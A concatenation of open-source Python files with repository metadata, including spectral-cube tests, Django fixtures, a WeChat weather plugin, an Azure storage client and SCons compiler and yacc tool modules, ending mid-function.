# attribute. We would have to refactor deeply to correct this, and I
# really don't want to do that because 'None' is a much more reasonable
# and less dangerous default for a mask.
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
assert spec.mask is False
from astropy.convolution import convolve,Box1DKernel
convolve(spec, Box1DKernel(3))
def test_convolve():
test_wcs_1 = WCS(naxis=1)
spec = OneDSpectrum(twelve_qty_1d, wcs=test_wcs_1)
from astropy.convolution import Box1DKernel
specsmooth = spec.spectral_smooth(Box1DKernel(1))
np.testing.assert_allclose(spec, specsmooth)
def test_spectral_interpolate():
test_wcs_1 = WCS(naxis=1)
test_wcs_1.wcs.cunit[0] = 'GHz'
spec = OneDSpectrum(np.arange(12)*u.Jy, wcs=test_wcs_1)
new_xaxis = test_wcs_1.wcs_pix2world(np.linspace(0,11,23), 0)[0] * u.Unit(test_wcs_1.wcs.cunit[0])
new_spec = spec.spectral_interpolate(new_xaxis)
np.testing.assert_allclose(new_spec, np.linspace(0,11,23)*u.Jy)
def test_spectral_interpolate_with_mask(data_522_delta, use_dask):
hdu = fits.open(data_522_delta)[0]
# Swap the velocity axis so indiff < 0 in spectral_interpolate
hdu.header["CDELT3"] = - hdu.header["CDELT3"]
cube = SpectralCube.read(hdu, use_dask=use_dask)
mask = np.ones(cube.shape, dtype=bool)
mask[:2] = False
masked_cube = cube.with_mask(mask)
spec = masked_cube[:, 0, 0]
# midpoint between each position
sg = (spec.spectral_axis[1:] + spec.spectral_axis[:-1])/2.
result = spec.spectral_interpolate(spectral_grid=sg[::-1])
# The output makes CDELT3 > 0 (reversed spectral axis) so the masked
    # portion is the final 2 channels.
np.testing.assert_almost_equal(result.filled_data[:].value,
[0.0, 0.5, np.NaN, np.NaN])
def test_spectral_interpolate_reversed(data_522_delta, use_dask):
cube, data = cube_and_raw(data_522_delta, use_dask=use_dask)
# Reverse spectral axis
sg = cube.spectral_axis[::-1]
spec = cube[:, 0, 0]
result = spec.spectral_interpolate(spectral_grid=sg)
np.testing.assert_almost_equal(sg.value, result.spectral_axis.value)
def test_spectral_interpolate_with_fillvalue(data_522_delta, use_dask):
cube, data = cube_and_raw(data_522_delta, use_dask=use_dask)
# Step one channel out of bounds.
sg = ((cube.spectral_axis[0]) -
(cube.spectral_axis[1] - cube.spectral_axis[0]) *
np.linspace(1,4,4))
spec = cube[:, 0, 0]
result = spec.spectral_interpolate(spectral_grid=sg,
fill_value=42)
np.testing.assert_almost_equal(result.value,
np.ones(4)*42)
def test_spectral_units(data_255_delta, use_dask):
# regression test for issue 391
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
assert sp.spectral_axis.unit == u.km/u.s
assert sp.header['CUNIT1'] == 'km s-1'
sp = cube.with_spectral_unit(u.m/u.s)[:,0,0]
assert sp.spectral_axis.unit == u.m/u.s
assert sp.header['CUNIT1'] in ('m s-1', 'm/s')
def test_repr_1d(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
print(sp)
print(sp[1:-1])
assert 'OneDSpectrum' in sp.__repr__()
assert 'OneDSpectrum' in sp[1:-1].__repr__()
def test_1d_slices(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
assert sp.max() == cube.max(axis=0)[0,0]
assert not isinstance(sp.max(), OneDSpectrum)
sp = cube[:-1,0,0]
assert sp.max() == cube[:-1,:,:].max(axis=0)[0,0]
assert not isinstance(sp.max(), OneDSpectrum)
# TODO: Unpin when Numpy bug is resolved.
@pytest.mark.skipif(not NUMPY_LT_1_22 and sys.platform == 'win32',
reason='https://github.com/numpy/numpy/issues/20699')
@pytest.mark.parametrize('method',
('min', 'max', 'std', 'mean', 'sum', 'cumsum',
'nansum', 'ptp', 'var'),
)
def test_1d_slice_reductions(method, data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
if hasattr(cube, method):
spmethod = getattr(sp, method)
cubemethod = getattr(cube, method)
assert spmethod() == cubemethod(axis=0)[0,0]
else:
method = getattr(sp, method)
result = method()
assert hasattr(sp, '_fill_value')
assert 'OneDSpectrum' in sp.__repr__()
assert 'OneDSpectrum' in sp[1:-1].__repr__()
def test_1d_slice_round(data_255_delta, use_dask):
cube, data = cube_and_raw(data_255_delta, use_dask=use_dask)
sp = cube[:,0,0]
assert all(sp.value.round() == sp.round().value)
assert hasattr(sp, '_fill_value')
assert hasattr(sp.round(), '_fill_value')
assert 'OneDSpectrum' in sp.round().__repr__()
assert 'OneDSpectrum' in sp[1:-1].round().__repr__()
def test_LDO_arithmetic(data_vda, use_dask):
cube, data = cube_and_raw(data_vda, use_dask=use_dask)
sp = cube[:,0,0]
spx2 = sp * 2
assert np.all(spx2.value == sp.value*2)
assert np.all(spx2.filled_data[:].value == sp.value*2)
def test_beam_jtok_2D(data_advs, use_dask):
cube, data = cube_and_raw(data_advs, use_dask=use_dask)
cube._meta['BUNIT'] = 'Jy / beam'
cube._unit = u.Jy / u.beam
plane = cube[0]
freq = cube.with_spectral_unit(u.GHz).spectral_axis[0]
equiv = plane.beam.jtok_equiv(freq)
jtok = plane.beam.jtok(freq)
Kplane = plane.to(u.K, equivalencies=equiv, freq=freq)
np.testing.assert_almost_equal(Kplane.value,
(plane.value * jtok).value)
# test that the beam equivalencies are correctly automatically defined
Kplane = plane.to(u.K, freq=freq)
np.testing.assert_almost_equal(Kplane.value,
(plane.value * jtok).value)
bunits_list = [u.Jy / u.beam, u.K, u.Jy / u.sr, u.Jy / u.pix, u.Jy / u.arcsec**2,
u.mJy / u.beam, u.mK]
@pytest.mark.parametrize(('init_unit'), bunits_list)
def test_unit_conversions_general_2D(data_advs, use_dask, init_unit):
cube, data = cube_and_raw(data_advs, use_dask=use_dask)
cube._meta['BUNIT'] = init_unit.to_string()
cube._unit = init_unit
plane = cube[0]
# Check all unit conversion combos:
for targ_unit in bunits_list:
newplane = plane.to(targ_unit)
if init_unit == targ_unit:
np.testing.assert_almost_equal(newplane.value,
plane.value)
else:
roundtrip_plane = newplane.to(init_unit)
np.testing.assert_almost_equal(roundtrip_plane.value,
plane.value)
# TODO: Our 1D objects do NOT retain the spatial info needed for other BUNIT conversions
# e.g., Jy/sr, Jy/pix. So we're limited to Jy/beam -> K conversion for now
# See: https://github.com/radio-astro-tools/spectral-cube/pull/395
bunits_list_1D = [u.Jy / u.beam, u.K,
u.mJy / u.beam, u.mK]
@pytest.mark.parametrize(('init_unit'), bunits_list_1D)
def test_unit_conversions_general_1D(data_advs, use_dask, init_unit):
cube, data = cube_and_raw(data_advs, use_dask=use_dask)
cube._meta['BUNIT'] = init_unit.to_string()
cube._unit = init_unit
spec = cube[:, 0, 0]
# Check all unit conversion combos:
for targ_unit in bunits_list_1D:
newspec = spec.to(targ_unit)
if init_unit == targ_unit:
np.testing.assert_almost_equal(newspec.value,
spec.value)
else:
roundtrip_spec = newspec.to(init_unit)
np.testing.assert_almost_equal(roundtrip_spec.value,
spec.value)
@pytest.mark.parametrize(('init_unit'), bunits_list_1D)
def test_multibeams_unit_conversions_general_1D(data_vda_beams, use_dask, init_unit):
cube, data = cube_and_raw(data_vda_beams, use_dask=use_dask)
cube._meta['BUNIT'] = init_unit.to_string()
cube._unit = init_unit
spec = cube[:, 0, 0]
# Check all unit conversion combos:
for targ_unit in bunits_list_1D:
newspec = spec.to(targ_unit)
if init_unit == targ_unit:
np.testing.assert_almost_equal(newspec.value,
spec.value)
else:
roundtrip_spec = newspec.to(init_unit)
np.testing.assert_almost_equal(roundtrip_spec.value,
spec.value)
def test_basic_arrayness(data_adv, use_dask):
cube, data = cube_and_raw(data_adv, use_dask=use_dask)
assert cube.shape == data.shape
spec = cube[:,0,0]
assert np.all(np.asanyarray(spec).value == data[:,0,0])
assert np.all(np.array(spec) == data[:,0,0])
assert np.all(np.asarray(spec) == data[:,0,0])
# These are commented out because it is presently not possible to convert
# projections to masked arrays
# assert np.all(np.ma.asanyarray(spec).value == data[:,0,0])
# assert np.all(np.ma.asarray(spec) == data[:,0,0])
# assert np.all(np.ma.array(spec) == data[:,0,0])
slc = cube[0,:,:]
assert np.all(np.asanyarray(slc).value == data[0,:,:])
assert np.all(np.array(slc) == data[0,:,:])
assert np.all(np.asarray(slc) == data[0,:,:])
# assert np.all(np.ma.asanyarray(slc).value == data[0,:,:])
# assert np.all(np.ma.asarray(slc) == data[0,:,:])
# assert np.all(np.ma.array(slc) == data[0,:,:])
def test_spatial_world_extrema_2D(data_522_delta, use_dask):
hdu = fits.open(data_522_delta)[0]
cube = SpectralCube.read(hdu, use_dask=use_dask)
plane = cube[0]
assert (cube.world_extrema == plane.world_extrema).all()
assert (cube.longitude_extrema == plane.longitude_extrema).all()
assert (cube.latitude_extrema == plane.latitude_extrema).all()
@pytest.mark.parametrize('view', (np.s_[:, :],
np.s_[::2, :],
np.s_[0]))
def test_spatial_world(view, data_adv, use_dask):
p = path(data_adv)
# d = fits.getdata(p)
# wcs = WCS(p)
# c = SpectralCube(d, wcs)
c = SpectralCube.read(p, use_dask=use_dask)
plane = c[0]
wcs = plane.wcs
shp = plane.shape
inds = np.indices(plane.shape)
pix = np.column_stack([i.ravel() for i in inds[::-1]])
world = wcs.all_pix2world(pix, 0).T
world = [w.reshape(shp) for w in world]
world = [w[view] * u.Unit(wcs.wcs.cunit[i])
for i, w in enumerate(world)][::-1]
w2 = plane.world[view]
for result, expected in zip(w2, world):
assert_allclose(result, expected)
# Test world_flattened here, too
# TODO: Enable once 2D masking is a thing
w2_flat = plane.flattened_world(view=view)
for result, expected in zip(w2_flat, world):
print(result.shape, expected.flatten().shape)
assert_allclose(result, expected.flatten())
|
e-koch/spectral-cube
|
spectral_cube/tests/test_projection.py
|
Python
|
bsd-3-clause
| 27,131
|
#!/usr/bin/env python
from __future__ import division
__author__ = 'youval.dar'
|
youdar/usesul_functions
|
source/read_write_to_mysql/__init__.py
|
Python
|
mit
| 84
|
from __future__ import absolute_import
from HTMLParser import *
|
timothycrosley/pies
|
pies2overrides/html/parser.py
|
Python
|
mit
| 65
|
import pytest
@pytest.fixture
def builtins_open(mocker):
return mocker.patch('six.moves.builtins.open')
@pytest.fixture
def isfile(mocker):
return mocker.patch('os.path.isfile', return_value=True)
@pytest.fixture
@pytest.mark.usefixtures('isfile')
def history_lines(mocker):
def aux(lines):
mock = mocker.patch('io.open')
mock.return_value.__enter__ \
.return_value.readlines.return_value = lines
return aux
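# Hedged usage sketch (hypothetical test, not part of this conftest): the
# factory fixture above returns `aux`, so a test can feed fake history lines
# and any code under test that reads the history file via io.open sees them:
#
#   def test_history(history_lines):
#       history_lines(['ls\n', 'cd ..\n'])
#       ...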
|
lawrencebenson/thefuck
|
tests/shells/conftest.py
|
Python
|
mit
| 459
|
from datetime import date, time, timedelta
from decimal import Decimal
import itertools
from django.utils import timezone
from six.moves import xrange
from .models import Person
def get_fixtures(n=None):
"""
Returns `n` dictionaries of `Person` objects.
If `n` is not specified it defaults to 6.
"""
_now = timezone.now().replace(microsecond=0) # mysql doesn't do microseconds. # NOQA
_date = date(2015, 3, 28)
_time = time(13, 0)
fixtures = [
{
'big_age': 59999999999999999, 'comma_separated_age': '1,2,3',
'age': -99, 'positive_age': 9999, 'positive_small_age': 299,
'small_age': -299, 'certified': False, 'null_certified': None,
'name': 'Mike', 'email': 'miketakeahike@mailinator.com',
'file_path': '/Users/user/fixtures.json', 'slug': 'mike',
'text': 'here is a dummy text',
'url': 'https://docs.djangoproject.com',
'height': Decimal('1.81'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 0.3,
'remote_addr': '192.0.2.30', 'my_file': 'dummy.txt',
'image': 'kitten.jpg', 'data': {'name': 'Mike', 'age': -99},
},
{
'big_age': 245999992349999, 'comma_separated_age': '6,2,9',
'age': 25, 'positive_age': 49999, 'positive_small_age': 315,
'small_age': 5409, 'certified': False, 'null_certified': True,
'name': 'Pete', 'email': 'petekweetookniet@mailinator.com',
'file_path': 'users.json', 'slug': 'pete', 'text': 'dummy',
'url': 'https://google.com', 'height': Decimal('1.93'),
'date_time': _now, 'date': _date, 'time': _time,
'float_height': 0.5, 'remote_addr': '127.0.0.1',
'my_file': 'fixtures.json',
'data': [{'name': 'Pete'}, {'name': 'Mike'}],
},
{
'big_age': 9929992349999, 'comma_separated_age': '6,2,9,10,5',
'age': 29, 'positive_age': 412399, 'positive_small_age': 23315,
'small_age': -5409, 'certified': False, 'null_certified': True,
'name': 'Ash', 'email': 'rashash@mailinator.com',
'file_path': '/Downloads/kitten.jpg', 'slug': 'ash',
'text': 'bla bla bla', 'url': 'news.ycombinator.com',
'height': Decimal('1.78'), 'date_time': _now,
'date': _date, 'time': _time,
'float_height': 0.8, 'my_file': 'dummy.png',
'data': {'text': 'bla bla bla', 'names': ['Mike', 'Pete']},
},
{
'big_age': 9992349234, 'comma_separated_age': '12,29,10,5',
'age': -29, 'positive_age': 4199, 'positive_small_age': 115,
'small_age': 909, 'certified': True, 'null_certified': False,
'name': 'Mary', 'email': 'marykrismas@mailinator.com',
'file_path': 'dummy.png', 'slug': 'mary',
'text': 'bla bla bla bla bla', 'url': 'news.ycombinator.com',
'height': Decimal('1.65'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 0,
'remote_addr': '2a02:42fe::4',
'data': {'names': {'name': 'Mary'}},
},
{
'big_age': 999234, 'comma_separated_age': '12,1,30,50',
'age': 1, 'positive_age': 99199, 'positive_small_age': 5,
'small_age': -909, 'certified': False, 'null_certified': False,
'name': 'Sandra', 'email': 'sandrasalamandr@mailinator.com',
'file_path': '/home/dummy.png', 'slug': 'sandra',
'text': 'this is a dummy text', 'url': 'google.com',
'height': Decimal('1.59'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 2 ** 2,
'image': 'dummy.jpeg', 'data': {},
},
{
'big_age': 9999999999, 'comma_separated_age': '1,100,3,5',
'age': 35, 'positive_age': 1111, 'positive_small_age': 500,
'small_age': 110, 'certified': True, 'null_certified': None,
'name': 'Crystal', 'email': 'crystalpalace@mailinator.com',
'file_path': '/home/dummy.txt', 'slug': 'crystal',
'text': 'dummy text', 'url': 'docs.djangoproject.com',
'height': Decimal('1.71'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 2 ** 10,
'image': 'dummy.png', 'data': [],
},
]
n = n or len(fixtures)
fixtures = itertools.cycle(fixtures)
for _ in xrange(n):
yield next(fixtures)
def create_fixtures(n=None):
"""
Wrapper for Person.bulk_create which creates `n` fixtures
"""
Person.objects.bulk_create(Person(**person)
for person in get_fixtures(n))
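# Hedged usage sketch (hypothetical, not part of this fixtures module):
#
#   create_fixtures(3)                  # bulk-creates three Person rows,
#   assert Person.objects.count() == 3  # cycling through the dicts above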
|
lead-ratings/django-bulk-update
|
tests/fixtures.py
|
Python
|
mit
| 4,775
|
TASKS = {
"tests.tasks.general.Retry": {
"max_retries": 1,
"retry_delay": 1
}
}
|
IAlwaysBeCoding/mrq
|
tests/fixtures/config-retry1.py
|
Python
|
mit
| 105
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .. import app, celery
import hashlib
import hmac
import time
import requests
from . import wechat_custom
@celery.task
def get(openid):
"""获取天气与空气质量预报"""
content = []
current_hour = time.strftime('%H')
try:
pm_25_info = get_pm2_5_info()
except Exception, e:
app.logger.warning(u'PM2.5 API 超时出错:%s' % e)
else:
title_aqi = u'空气质量等级:%s\n%s点的平均PM2.5:%s' % (
pm_25_info[0]['quality'], current_hour, pm_25_info[0]['pm2_5'])
content.append({"title": title_aqi})
try:
weather_info = get_weather_info()
except Exception, e:
app.logger.warning(u'天气 API 超时出错:%s' % e)
content = u"天气查询超时\n请稍后重试"
wechat_custom.send_text(openid, content)
else:
for index, data in enumerate(weather_info):
title_weather = u'%s %s℃\n%s %s ' % (
day_of_week(offset=index),
data['temp'],
data['weather'],
data['wind'])
content.append({"title": title_weather, "picurl": data['img_url']})
wechat_custom.send_news(openid, content)
def get_weather_info():
"""
    Query the weather forecast.
    API details: http://openweather.weather.com.cn/Home/Help/Product.html
    Weather icon downloads: http://openweather.weather.com.cn/Home/Help/icon/iid/10.html
"""
private_key = app.config['WEATHER_PRIVATE_KEY']
appid = app.config['WEATHER_APPID']
appid_six = appid[:6]
    areaid = '101281601'  # Area code for Dongguan
date = time.strftime('%Y%m%d%H%M')
    # Build the request URL as described in the API documentation
public_key = 'http://open.weather.com.cn/data/?' +\
'areaid=%s&type=forecast_v&date=%s&appid=%s' % (areaid, date, appid)
key = hmac.new(private_key, public_key, hashlib.sha1).digest().encode(
'base64').rstrip()
url = 'http://open.weather.com.cn/data/?' +\
'areaid=%s&type=forecast_v&date=%s&appid=%s&key=%s' % (
areaid, date, appid_six, key)
res = requests.get(url, timeout=7)
weather_info = res.json()['f']['f1']
    # Parse the response into human-readable data
img_url = "http://gxgk-wechat.b0.upaiyun.com/weather/day/%s.jpeg"
data = []
for weather in weather_info:
        # At night the daytime fields for the current day are empty, so use the night data instead
if weather['fa'] == u'':
temp = weather['fd']
weather_code = weather['fb']
wind_code = weather['ff']
else:
temp = weather['fc']
weather_code = weather['fa']
wind_code = weather['fe']
data.append({
"temp": temp,
"weather": weather_code_to_text(weather_code),
"wind": wind_code_to_text(wind_code),
"img_url": img_url % weather_code
})
return data
def get_pm2_5_info():
"""
    Query air quality (PM2.5).
    API details: http://www.pm25.in/api_doc
"""
url = 'http://www.pm25.in/api/querys/pm2_5.json?' +\
'city=dongguan&token=%s&stations=no' % app.config['PM2_5_TOKEN']
res = requests.get(url, timeout=7)
return res.json()
def day_of_week(offset=0):
"""获取星期几"""
day_of_week = int(time.strftime('%w')) + offset
days = [u'周日', u'周一', u'周二', u'周三', u'周四', u'周五', u'周六',
u'周日', u'周一']
prefix = [u'今天', u'明天', u'后天']
return prefix[offset] + days[day_of_week]
def weather_code_to_text(code):
"""转换天气代码为文字"""
weather_list = [u'晴', u'多云', u'阴', u'阵雨', u'雷阵雨', u'雷阵雨伴有冰雹',
u'雨夹雪', u'小雨', u'中雨', u'大雨', u'暴雨', u'大暴雨',
u'特大暴雨', u'阵雪', u'小雪', u'中雪', u'大雪', u'暴雪', u'雾',
u'冻雨', u'沙尘暴', u'小到中雨', u'中到大雨', u'大到暴雨',
u'暴雨到大暴雨', u'大暴雨到特大暴雨', u'小到中雪', u'中到大雪',
u'大到暴雪', u'浮尘', u'扬沙', u'强沙尘暴', u'霾', u'无']
return weather_list[int(code)]
def wind_code_to_text(code):
"""转换风向代码为文字"""
wind_list = [u'微风', u'东北风', u'东风', u'东南风', u'南风', u'西南风',
u'西风', u'西北风', u'北风', u'旋转风']
return wind_list[int(code)]
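# Hedged illustration (not part of the original module): the code-to-text
# helpers above are plain list lookups, e.g.
#   weather_code_to_text('1')  # -> u'多云'
#   wind_code_to_text('2')     # -> u'东风'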
|
15klli/WeChat-Clone
|
main/plugins/weather.py
|
Python
|
mit
| 4,482
|
import astropy.io.fits
import numpy as np
import matplotlib.pyplot as plt
# Create an empty numpy array. 2D; spectra with 4 data elements.
filtered = np.zeros((2040,4))
combined_extracted_1d_spectra_ = astropy.io.fits.open("xtfbrsnN20160705S0025.fits")
exptime = float(combined_extracted_1d_spectra_[0].header['EXPTIME'])
wstart = combined_extracted_1d_spectra_[1].header['CRVAL1']
wdelt = combined_extracted_1d_spectra_[1].header['CD1_1']
for i in range(len(filtered)):
filtered[i][0] = wstart + (i*wdelt)
print "Wavelength array: \n", filtered
f = open("hk.txt")
lines = f.readlines()
f.close()
lines = [lines[i].strip().split() for i in range(len(lines))]
for i in range(len(lines)):
lines[i][0] = float(lines[i][0])*10**4
for i in range(len(filtered)):
mindif = min(lines, key=lambda x:abs(x[0]-filtered[i][0]))
filtered[i][1] = mindif[2]
calibspec = np.load("calibspec.npy")
"""
effspec = np.load("effspec.npy")
print "Effspec:\n", effspec
calibspec = np.zeros((2040))
for i in range(len(effspec)):
if effspec[i] != 0:
calibspec[i] = combined_extracted_1d_spectra_[1].data[i]/exptime/effspec[i]
else:
calibspec[i] = 0
"""
filter_weighted_flux = []
temp_percentages = []
for i in range(len(calibspec)):
filtered[i][2] = calibspec[i]
filtered[i][3] = filtered[i][1] * filtered[i][2] * 0.01
filter_weighted_flux.append(filtered[i][3])
temp_percentages.append(filtered[i][1]*0.01)
print "\nIntegral of filter_weighted_flux:"
print np.trapz(filter_weighted_flux)
print "\nIntegral of percentages:"
print np.trapz(temp_percentages)
print "Integral of filter_weighted_flux divided by integral of percentages:"
print np.trapz(filter_weighted_flux)/np.trapz(temp_percentages)
plt.figure(1)
plt.plot(calibspec)
plt.plot(filter_weighted_flux, "r--")
plt.figure(2)
plt.plot(temp_percentages)
plt.show()
|
mrlb05/Nifty
|
tests/generate_response_curve.py
|
Python
|
mit
| 1,827
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 1.1.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.storage_accounts_operations import StorageAccountsOperations
from .operations.usage_operations import UsageOperations
from . import models
class StorageManagementClientConfiguration(AzureConfiguration):
"""Configuration for StorageManagementClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify Microsoft Azure subscription. The subscription ID forms part of
the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not isinstance(subscription_id, str):
raise TypeError("Parameter 'subscription_id' must be str.")
if not base_url:
base_url = 'https://management.azure.com'
super(StorageManagementClientConfiguration, self).__init__(base_url)
self.add_user_agent('storagemanagementclient/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
class StorageManagementClient(object):
"""The Storage Management Client.
:ivar config: Configuration for client.
:vartype config: StorageManagementClientConfiguration
:ivar storage_accounts: StorageAccounts operations
:vartype storage_accounts: storage.operations.StorageAccountsOperations
:ivar usage: Usage operations
:vartype usage: storage.operations.UsageOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify Microsoft Azure subscription. The subscription ID forms part of
the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
self.config = StorageManagementClientConfiguration(credentials, subscription_id, base_url)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self.api_version = '2015-06-15'
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.storage_accounts = StorageAccountsOperations(
self._client, self.config, self._serialize, self._deserialize)
self.usage = UsageOperations(
self._client, self.config, self._serialize, self._deserialize)
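# Hedged usage sketch (illustrative only; the credentials object would come
# from msrestazure.azure_active_directory):
#
#   client = StorageManagementClient(credentials, 'my-subscription-id')
#   client.storage_accounts  # StorageAccountsOperations
#   client.usage             # UsageOperations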
|
dsgouda/autorest
|
Samples/2a-validation/Python/storage/storage_management_client.py
|
Python
|
mit
| 3,693
|
"""SCons.Tool.aixc++
Tool-specific initialization for IBM xlC / Visual Age C++ compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/aixc++.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import os.path
import SCons.Platform.aix
cplusplus = __import__('c++', globals(), locals(), [])
packages = ['vacpp.cmp.core', 'vacpp.cmp.batch', 'vacpp.cmp.C', 'ibmcxx.cmp']
def get_xlc(env):
xlc = env.get('CXX', 'xlC')
return SCons.Platform.aix.get_xlc(env, xlc, packages)
def generate(env):
"""Add Builders and construction variables for xlC / Visual Age
suite to an Environment."""
path, _cxx, version = get_xlc(env)
if path and _cxx:
_cxx = os.path.join(path, _cxx)
if 'CXX' not in env:
env['CXX'] = _cxx
cplusplus.generate(env)
if version:
env['CXXVERSION'] = version
def exists(env):
path, _cxx, version = get_xlc(env)
if path and _cxx:
xlc = os.path.join(path, _cxx)
if os.path.exists(xlc):
return xlc
return None
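# Hedged usage sketch (hypothetical SConstruct, not part of this module):
# requesting the tool configures xlC when it is installed:
#   env = Environment(tools=['default', 'aixc++'])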
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
EmanueleCannizzaro/scons
|
src/engine/SCons/Tool/aixc++.py
|
Python
|
mit
| 2,413
|
"""SCons.Tool.yacc
Tool-specific initialization for yacc.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/yacc.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import os.path
import SCons.Defaults
import SCons.Tool
import SCons.Util
YaccAction = SCons.Action.Action("$YACCCOM", "$YACCCOMSTR")
def _yaccEmitter(target, source, env, ysuf, hsuf):
yaccflags = env.subst("$YACCFLAGS", target=target, source=source)
flags = SCons.Util.CLVar(yaccflags)
targetBase, targetExt = os.path.splitext(SCons.Util.to_String(target[0]))
if '.ym' in ysuf: # If using Objective-C
target = [targetBase + ".m"] # the extension is ".m".
# If -d is specified on the command line, yacc will emit a .h
# or .hpp file with the same name as the .c or .cpp output file.
if '-d' in flags:
target.append(targetBase + env.subst(hsuf, target=target, source=source))
# If -g is specified on the command line, yacc will emit a .vcg
# file with the same base name as the .y, .yacc, .ym or .yy file.
if "-g" in flags:
base, ext = os.path.splitext(SCons.Util.to_String(source[0]))
target.append(base + env.subst("$YACCVCGFILESUFFIX"))
# If -v is specified yacc will create the output debug file
# which is not really source for any process, but should
# be noted and also be cleaned
# Bug #2558
if "-v" in flags:
env.SideEffect(targetBase+'.output',target[0])
env.Clean(target[0],targetBase+'.output')
# With --defines and --graph, the name of the file is totally defined
# in the options.
fileGenOptions = ["--defines=", "--graph="]
for option in flags:
for fileGenOption in fileGenOptions:
l = len(fileGenOption)
if option[:l] == fileGenOption:
# A file generating option is present, so add the file
# name to the list of targets.
fileName = option[l:].strip()
target.append(fileName)
return (target, source)
def yEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.y', '.yacc'], '$YACCHFILESUFFIX')
def ymEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.ym'], '$YACCHFILESUFFIX')
def yyEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.yy'], '$YACCHXXFILESUFFIX')
def generate(env):
"""Add Builders and construction variables for yacc to an Environment."""
c_file, cxx_file = SCons.Tool.createCFileBuilders(env)
# C
c_file.add_action('.y', YaccAction)
c_file.add_emitter('.y', yEmitter)
c_file.add_action('.yacc', YaccAction)
c_file.add_emitter('.yacc', yEmitter)
# Objective-C
c_file.add_action('.ym', YaccAction)
c_file.add_emitter('.ym', ymEmitter)
# C++
cxx_file.add_action('.yy', YaccAction)
cxx_file.add_emitter('.yy', yyEmitter)
env['YACC'] = env.Detect('bison') or 'yacc'
env['YACCFLAGS'] = SCons.Util.CLVar('')
